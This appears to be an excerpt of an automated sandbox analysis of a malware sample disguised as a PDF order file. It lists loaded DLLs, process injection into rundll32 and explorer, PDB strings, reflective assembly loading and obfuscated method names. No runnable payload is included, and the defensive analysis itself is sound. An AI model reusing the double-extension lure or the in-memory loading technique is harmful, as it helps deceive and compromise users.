          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: NgWS.pdb source: ORDER_1105-19-24-3537.pdf.exe
          Source: Binary string: wntdll.pdbUGP source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2166507711.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2169166091.0000000004784000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ORDER_1105-19-24-3537.pdf.exe, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000003.2166507711.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2169166091.0000000004784000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: NgWS.pdbSHA256 source: ORDER_1105-19-24-3537.pdf.exe

          Data Obfuscation

          barindex
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.cs.Net Code: xokE9SrNrX System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.cs.Net Code: xokE9SrNrX System.Reflection.Assembly.Load(byte[])
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.cs.Net Code: xokE9SrNrX System.Reflection.Assembly.Load(byte[])
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: 0x8C1323AF [Mon Jun 20 19:42:39 2044 UTC]
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 0_2_07614130 push eax; retf 0_2_07614131
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_00416897 push ds; ret 4_2_0041689F
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0040ABD9 pushfd ; retf 4_2_0040ABDA
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041644F pushfd ; iretd 4_2_00416450
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041D4F2 push eax; ret 4_2_0041D4F8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041D4FB push eax; ret 4_2_0041D562
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041D4A5 push eax; ret 4_2_0041D4F8
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041D55C push eax; ret 4_2_0041D562
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041DDF6 push 8008D580h; iretd 4_2_0041DE00
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041D593 push ebx; ret 4_2_0041DC8E
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_00407790 pushad ; iretd 4_2_00407791
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_011409AD push ecx; mov dword ptr [esp], ecx4_2_011409B6
          Source: C:\Windows\explorer.exeCode function: 6_2_0F007B02 push esp; retn 0000h6_2_0F007B03
          Source: C:\Windows\explorer.exeCode function: 6_2_0F007B1E push esp; retn 0000h6_2_0F007B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0F0079B5 push esp; retn 0000h6_2_0F007AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9EBB1E push esp; retn 0000h6_2_0F9EBB1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9EBB02 push esp; retn 0000h6_2_0F9EBB03
          Source: C:\Windows\explorer.exeCode function: 6_2_0F9EB9B5 push esp; retn 0000h6_2_0F9EBAE7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A06883 push ecx; ret 8_2_00A06896
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00A0682D push ecx; ret 8_2_00A06840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049327FA pushad ; ret 8_2_049327F9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0493225F pushad ; ret 8_2_049327F9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0493283D push eax; iretd 8_2_04932858
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_049609AD push ecx; mov dword ptr [esp], ecx8_2_049609B6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007A644F pushfd ; iretd 8_2_007A6450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AD4FB push eax; ret 8_2_007AD562
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AD4F2 push eax; ret 8_2_007AD4F8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AD4A5 push eax; ret 8_2_007AD4F8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AD55C push eax; ret 8_2_007AD562
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_007AD593 push ebx; ret 8_2_007ADC8E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00797790 pushad ; iretd 8_2_00797791
          Source: ORDER_1105-19-24-3537.pdf.exeStatic PE information: section name: .text entropy: 7.758118048517549
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, piI8uUijJAV67QhTJy.csHigh entropy of concatenated method names: 'IxneR726yk', 'tJUe22nu4p', 'XvPePnuhgZ', 'yjHecqmcTi', 'r8YewQTIIf', 'iIcesUQT5K', 'NQDQ2oqmLJsyJiTdsk', 'IeAx0QutM7ghxx2nI2', 'IIIeeA8hmN', 'h1Ce0X7sbS'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, ntyPNQqd8Ald6834S8.csHigh entropy of concatenated method names: 'ToString', 'emasMgeoll', 'DqpsVd3l4i', 'jXvsxsRjhH', 'w7IsfxARFu', 'HrKsYbagbM', 'G6lsUPAnN4', 'XBfsHGdQYO', 'uO5soev7Mn', 'st4sXCPBA2'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.csHigh entropy of concatenated method names: 'rMr0FjIhjH', 'fIF0aqOkbn', 'FZL0iaQ09b', 'SOq08Ej30y', 'NWY0DIMRoh', 'PMb06v3IP3', 'SMQ0R2OSwb', 'RV402juAxY', 'HHR0Wt0xfe', 'qmW0Pe4Mja'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, XWip28D7gglolbiE2v.csHigh entropy of concatenated method names: 'Dispose', 'PineqBepZG', 'EsHyVZAEcS', 'uLHpphO4kn', 'UbhevNpr7U', 'tkbezIY64x', 'ProcessDialogKey', 'PUQygLD8f1', 'oxMyeot8uZ', 'EdlyyDNjoe'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, mKpsgsS2vj7ffukRBS.csHigh entropy of concatenated method names: 'Y0c9TUHM3', 'P9OBqqTnc', 'FchJC0Hum', 'jk55kVhbd', 'DDFuqf6aP', 'BLJChjbFS', 'M9aXeV4VLI3oacsJo8', 'TtlPGAVnwVIjBACIhB', 'AqtlcGXGq', 'zP8bErRfQ'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, VtMItTd45MA9KvyFQT.csHigh entropy of concatenated method names: 'Ml2ZekJK2M', 'inDZ0mw8c9', 'G5tZEmYKUl', 'g1CZaayNYZ', 'K50Zi7KC9y', 'JscZD8il9I', 'DohZ6WXASx', 'BeslmmKUUg', 'y6GlOuvb27', 'Q21lqDdfmR'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, yiy2XDz6h38oNvimW6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TV3Z76gM84', 'EtAZwtmI9r', 'hpMZsGypTD', 'ldrZjp8EmP', 'VSfZl123nq', 'Jr3ZZgYILd', 'MMHZbPQVxC'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, nVkVrvrLmpG0BesAYv.csHigh entropy of concatenated method names: 'uRnDQP9i1f', 'lU9D5vtZgD', 'g8L8x2HJxd', 'PI58fUqb0t', 'Y328Y4p85u', 'LCJ8UgLnQv', 'V0o8HkLAZI', 'NhJ8oWwfLK', 'KiR8Xfq0r6', 'NeI8ScaKbb'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, EqACNKGBg9AHraHJpeU.csHigh entropy of concatenated method names: 'cckZhp9r4J', 'o76ZKrYu9O', 'L8qZ94fmFs', 'QXGZBF4Bvg', 'cMaZQtous2', 'ThkZJ6nN3k', 'T8HZ5DG2yp', 'he2ZIKIQ4d', 'wgZZuEgdvd', 'MnKZCWk9av'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, MetIWETZ3FJ0RYQ6Sa.csHigh entropy of concatenated method names: 'O6kRhRlTKd', 'isqRKAqFAD', 'rgkR90kCxU', 'XT3RBMKjlV', 'rtoRQOEDru', 'S9wRJQCC2U', 'rUJR51hhFd', 'fyFRIDfMhS', 'ymGRuL4fP8', 'dr2RCN1dkH'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, prL8SWk9Dhladmn3jx.csHigh entropy of concatenated method names: 'mQtRaZAmKD', 'hBaR84xuSD', 'vIwR61mvRi', 'GGd6vmile0', 'qlY6z3V7y1', 'asARggwnNL', 'CuCReDEEMy', 'kYlRyEIHJ6', 'IVTR0jLERc', 'FdrRE39LTW'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, HpKpUH9J6HYDOSdXaW.csHigh entropy of concatenated method names: 'ctO6FodrQa', 'ajb6iemSpA', 'wk36DwelHZ', 'bX16RfiskZ', 'RR8625DVNg', 'BFlDNk7qjN', 'byHDrF61Lr', 'ugHDmFtFuD', 'TLxDOHJGFa', 'qwxDqBIorQ'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, Eysj8lc6j6IKC6fI9m.csHigh entropy of concatenated method names: 'XXKlafTNpZ', 'wnmlixdZIL', 'Qcql8uA06S', 'ObhlDHIQsV', 'Kqtl6lor9E', 'gLDlRmSliM', 'Tall2qJLdf', 'I9jlW6IlJS', 'GpmlPGZnib', 'm75lcAyjm2'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, hr5cNPU7SxIpsd8e8K.csHigh entropy of concatenated method names: 'dXZwSm9iIG', 'aPgwnv0GC5', 'axnwdiYKQq', 'sqUwAXiy5H', 'ATVwVZB2t8', 'O7PwxZCFaO', 'yPZwftjv65', 'jbPwYlNaQB', 'vPgwUWC3uw', 'RoxwHMyrAl'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, hV8VdQHDnIixJ02WRE.csHigh entropy of concatenated method names: 'aEF7IJ0Js4', 'JBx7uMmi5U', 'jYt71h6kw5', 'zva7VJZm4O', 'mgE7fNuqTC', 'HIJ7YdmONU', 'dEk7HldQeT', 'Poq7oLHVuq', 'cur7S6RiAq', 'naJ7Ml2DVr'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, yv2f9FL45JjqXUr6VO.csHigh entropy of concatenated method names: 'k3DjOFaLMo', 'YC1jvxaa5q', 'p5ylgEjmLN', 'ynwle8AhHl', 'i31jMA7grd', 'DmxjnKU06g', 'rsMj3AGCnr', 'htujdsDDWQ', 'dmnjA9Gk7s', 'PD2jLsvhk9'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, KmBHChENhiSgkuxeS2.csHigh entropy of concatenated method names: 'JkDidk68eb', 'adFiA8PN3H', 'kb0iLAUuHn', 'z7FiGejwMb', 'GsqiNJPwS2', 'SDLirj531d', 'EOGimkupZE', 'GuviOlyXGO', 'xxniqRZ1VY', 'LV1ivnDeMq'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, YZbDlb7vK4yKDQgN1q.csHigh entropy of concatenated method names: 's4HjPT3IyW', 'BPsjcaRop4', 'ToString', 'h8xjayUD0t', 'gqYjiDFQmW', 'EQPj8tibWk', 'H2HjD1mndZ', 'Qifj6AHkjP', 'WEyjRpD3FW', 'IJCj23SQAV'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, bebPGV2fABcdBLP15e.csHigh entropy of concatenated method names: 'eeyl14EdYj', 'cy7lVaKqAe', 'xoklxVhVL3', 'YmPlf0eqJi', 'X8JldaiG18', 'q81lYp8YYr', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, zCjBI2ufvlK4pO1FgQ.csHigh entropy of concatenated method names: 'epX8B2CvAV', 'OJ68JmEOnf', 'gqH8IGmC16', 'liX8unIprL', 'e1k8wXTmi2', 'guq8sHRApb', 'fhf8jUVgMj', 'Qip8lrookC', 'm758ZpHAVu', 'zZj8bQobLv'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, piI8uUijJAV67QhTJy.csHigh entropy of concatenated method names: 'IxneR726yk', 'tJUe22nu4p', 'XvPePnuhgZ', 'yjHecqmcTi', 'r8YewQTIIf', 'iIcesUQT5K', 'NQDQ2oqmLJsyJiTdsk', 'IeAx0QutM7ghxx2nI2', 'IIIeeA8hmN', 'h1Ce0X7sbS'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, ntyPNQqd8Ald6834S8.csHigh entropy of concatenated method names: 'ToString', 'emasMgeoll', 'DqpsVd3l4i', 'jXvsxsRjhH', 'w7IsfxARFu', 'HrKsYbagbM', 'G6lsUPAnN4', 'XBfsHGdQYO', 'uO5soev7Mn', 'st4sXCPBA2'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.csHigh entropy of concatenated method names: 'rMr0FjIhjH', 'fIF0aqOkbn', 'FZL0iaQ09b', 'SOq08Ej30y', 'NWY0DIMRoh', 'PMb06v3IP3', 'SMQ0R2OSwb', 'RV402juAxY', 'HHR0Wt0xfe', 'qmW0Pe4Mja'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, XWip28D7gglolbiE2v.csHigh entropy of concatenated method names: 'Dispose', 'PineqBepZG', 'EsHyVZAEcS', 'uLHpphO4kn', 'UbhevNpr7U', 'tkbezIY64x', 'ProcessDialogKey', 'PUQygLD8f1', 'oxMyeot8uZ', 'EdlyyDNjoe'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, mKpsgsS2vj7ffukRBS.csHigh entropy of concatenated method names: 'Y0c9TUHM3', 'P9OBqqTnc', 'FchJC0Hum', 'jk55kVhbd', 'DDFuqf6aP', 'BLJChjbFS', 'M9aXeV4VLI3oacsJo8', 'TtlPGAVnwVIjBACIhB', 'AqtlcGXGq', 'zP8bErRfQ'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, VtMItTd45MA9KvyFQT.csHigh entropy of concatenated method names: 'Ml2ZekJK2M', 'inDZ0mw8c9', 'G5tZEmYKUl', 'g1CZaayNYZ', 'K50Zi7KC9y', 'JscZD8il9I', 'DohZ6WXASx', 'BeslmmKUUg', 'y6GlOuvb27', 'Q21lqDdfmR'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, yiy2XDz6h38oNvimW6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TV3Z76gM84', 'EtAZwtmI9r', 'hpMZsGypTD', 'ldrZjp8EmP', 'VSfZl123nq', 'Jr3ZZgYILd', 'MMHZbPQVxC'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, nVkVrvrLmpG0BesAYv.csHigh entropy of concatenated method names: 'uRnDQP9i1f', 'lU9D5vtZgD', 'g8L8x2HJxd', 'PI58fUqb0t', 'Y328Y4p85u', 'LCJ8UgLnQv', 'V0o8HkLAZI', 'NhJ8oWwfLK', 'KiR8Xfq0r6', 'NeI8ScaKbb'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, EqACNKGBg9AHraHJpeU.csHigh entropy of concatenated method names: 'cckZhp9r4J', 'o76ZKrYu9O', 'L8qZ94fmFs', 'QXGZBF4Bvg', 'cMaZQtous2', 'ThkZJ6nN3k', 'T8HZ5DG2yp', 'he2ZIKIQ4d', 'wgZZuEgdvd', 'MnKZCWk9av'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, MetIWETZ3FJ0RYQ6Sa.csHigh entropy of concatenated method names: 'O6kRhRlTKd', 'isqRKAqFAD', 'rgkR90kCxU', 'XT3RBMKjlV', 'rtoRQOEDru', 'S9wRJQCC2U', 'rUJR51hhFd', 'fyFRIDfMhS', 'ymGRuL4fP8', 'dr2RCN1dkH'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, prL8SWk9Dhladmn3jx.csHigh entropy of concatenated method names: 'mQtRaZAmKD', 'hBaR84xuSD', 'vIwR61mvRi', 'GGd6vmile0', 'qlY6z3V7y1', 'asARggwnNL', 'CuCReDEEMy', 'kYlRyEIHJ6', 'IVTR0jLERc', 'FdrRE39LTW'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, HpKpUH9J6HYDOSdXaW.csHigh entropy of concatenated method names: 'ctO6FodrQa', 'ajb6iemSpA', 'wk36DwelHZ', 'bX16RfiskZ', 'RR8625DVNg', 'BFlDNk7qjN', 'byHDrF61Lr', 'ugHDmFtFuD', 'TLxDOHJGFa', 'qwxDqBIorQ'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, Eysj8lc6j6IKC6fI9m.csHigh entropy of concatenated method names: 'XXKlafTNpZ', 'wnmlixdZIL', 'Qcql8uA06S', 'ObhlDHIQsV', 'Kqtl6lor9E', 'gLDlRmSliM', 'Tall2qJLdf', 'I9jlW6IlJS', 'GpmlPGZnib', 'm75lcAyjm2'
          Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, hr5cNPU7SxIpsd8e8K.csHigh entropy of concatenated method names: 'dXZwSm9iIG', 'aPgwnv0GC5', 'axnwdiYKQq', 'sqUwAXiy5H', 'ATVwVZB2t8', 'O7PwxZCFaO', 'yPZwftjv65', 'jbPwYlNaQB', 'vPgwUWC3uw', 'RoxwHMyrAl'
